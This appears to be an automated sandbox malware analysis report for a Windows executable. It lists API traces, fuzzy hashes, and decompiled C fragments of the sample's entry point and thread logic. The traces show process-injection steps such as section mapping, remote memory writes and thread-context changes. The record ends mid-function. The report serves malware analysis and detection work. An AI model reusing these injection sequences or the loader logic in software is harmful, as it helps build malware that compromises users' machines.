    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:0520E2BE92296DE286739115ACA14892
Total matches:34
Initial Analysis Report:Open
Initial sample Analysis ID:57932
Initial sample SHA 256:D4883169ADA9F2D88BB36D2A05634A56C26DF3CBEEDF9D8A2DA073CDB049F46D
Initial sample name:unker4.exe

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

